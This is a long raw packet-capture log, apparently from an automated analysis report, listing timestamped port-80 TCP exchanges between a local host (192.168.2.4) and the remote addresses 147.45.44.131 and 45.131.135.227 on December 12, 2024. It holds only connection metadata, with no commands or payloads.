                                                                        Dec 12, 2024 07:52:07.812879086 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:07.812903881 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:07.813618898 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:07.813647032 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:07.813677073 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:07.814253092 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:07.814327002 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:07.931004047 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:07.931086063 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:07.931297064 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:08.003937006 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:08.004113913 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:08.004203081 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:08.007622957 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:08.007746935 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:08.007811069 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:08.014049053 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:08.014221907 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:08.014319897 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:08.022439003 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:08.022569895 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:08.024233103 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:08.030858040 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:08.031008005 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:08.031521082 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:08.039213896 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:08.039387941 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:08.039454937 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:08.047583103 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:08.047811031 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:08.047888994 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:08.056159973 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:08.056308985 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:08.056401968 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:08.064330101 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:08.064502001 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:08.064563036 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:08.072797060 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:08.072921038 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:08.072999001 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:08.081206083 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:08.081381083 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:08.081480980 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:08.195683002 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:08.195712090 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:08.195895910 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:08.198013067 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:08.198136091 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:08.198232889 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:08.203052044 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:08.243973017 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:08.304292917 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:08.304721117 CET4973280192.168.2.445.131.135.227
                                                                        Dec 12, 2024 07:52:08.424082994 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:08.424508095 CET804973245.131.135.227192.168.2.4
                                                                        Dec 12, 2024 07:52:08.424632072 CET4973280192.168.2.445.131.135.227
                                                                        Dec 12, 2024 07:52:08.708161116 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:08.708189964 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:08.708626986 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:08.710138083 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:08.710326910 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:08.710407972 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:08.714948893 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:08.715112925 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:08.715183973 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:08.719655991 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:08.719841957 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:08.719907045 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:08.724469900 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:08.724714994 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:08.724785089 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:08.729223967 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:08.729399920 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:08.729551077 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:09.821984053 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.822134972 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.822173119 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.822247982 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:09.822767973 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.822830915 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:09.823230982 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.823281050 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.823345900 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:09.824167013 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.824202061 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.824259043 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:09.825191975 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.825226068 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.825289011 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:09.825968981 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.826003075 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.826060057 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:09.826900005 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.826936007 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.826968908 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.826983929 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:09.827848911 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.827884912 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.827898979 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:09.828787088 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.828819990 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.828841925 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:09.829754114 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.829787970 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.829809904 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:09.830743074 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.830776930 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.830790997 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:09.830810070 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.830861092 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:09.831543922 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.831579924 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.831693888 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:09.832487106 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.832526922 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.832592964 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:09.833314896 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.833355904 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:09.835175991 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.835216999 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.835251093 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.835252047 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:09.835303068 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:09.836146116 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.836182117 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.836246014 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:09.837028980 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.837065935 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.837112904 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:09.837675095 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.838057995 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.838100910 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:09.842438936 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.842668056 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.842741013 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:09.847217083 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.847467899 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.847527981 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:09.852019072 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.852196932 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.852262974 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:09.856755972 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.856991053 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.857060909 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:09.861550093 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.861778021 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.861840010 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:09.866353989 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.866575956 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.866656065 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:09.871083021 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.871300936 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.871371031 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:09.876035929 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.876234055 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.876302004 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:09.880635023 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.880824089 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.880892038 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:09.885371923 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.885616064 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.885679960 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:09.941680908 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.941915035 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.941998005 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:09.944067001 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.944262028 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.944366932 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:09.948898077 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.949039936 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.949109077 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:09.954530001 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.954566956 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.954636097 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:09.958991051 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.959027052 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.959110975 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:09.963285923 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.963434935 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.963505030 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:09.987901926 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.988094091 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.988110065 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.988245964 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:09.988761902 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.988776922 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.988816023 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:09.989492893 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.989509106 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.989535093 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:09.990274906 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.990289927 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.990319014 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:09.990925074 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.990972996 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.061031103 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.061197996 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.061269045 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.063246012 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.063429117 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.063503027 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.068048954 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.068242073 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.068310022 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.072849035 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.073014975 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.073077917 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.077586889 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.077815056 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.077878952 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.082375050 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.082552910 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.082607031 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.087150097 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.087357998 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.087414026 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.092067957 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.092164993 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.092231989 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.096695900 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.096956015 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.097022057 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.101582050 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.101768017 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.101851940 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.106321096 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.106498957 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.106658936 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.111021042 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.111212969 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.111798048 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.115825891 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.116012096 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.116131067 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.120599031 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.120809078 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.120887041 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.125386000 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.125612974 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.125680923 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.130294085 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.130363941 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.130522966 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.135065079 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.135241032 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.135314941 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.139678001 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.139857054 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.142528057 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.144493103 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.144690990 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.144984961 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.149255037 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.149447918 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.149502993 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.154036999 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.154195070 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.154256105 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.158791065 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.159004927 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.159318924 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.163542032 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.163728952 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.163927078 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.168384075 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.168546915 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.168612003 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.173116922 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.173300982 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.173360109 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.177963972 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.178134918 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.178237915 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.182702065 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.182826042 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.182885885 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.187488079 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.187674046 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.187740088 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.192255020 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.192420006 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.192503929 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.197050095 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.197221041 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.197285891 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.201752901 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.201951981 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.202013016 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.206506014 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.206702948 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.206912994 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.209865093 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.210092068 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.210148096 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.213090897 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.213314056 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.213458061 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.216371059 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.216537952 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.216645002 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.219646931 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.219849110 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.219929934 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.222939968 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.223136902 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.223196983 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.226177931 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.226370096 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.226480007 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.229506969 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.229691982 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.230525970 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.232705116 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.232877016 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.233021975 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.235881090 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.236164093 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.237802029 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.238991022 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.239187002 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.239247084 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.242049932 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.242213964 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.242281914 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.244975090 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.245174885 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.245232105 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.248023033 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.248231888 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.248301029 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.251373053 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.251724005 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.251787901 CET4973480192.168.2.4147.45.44.131
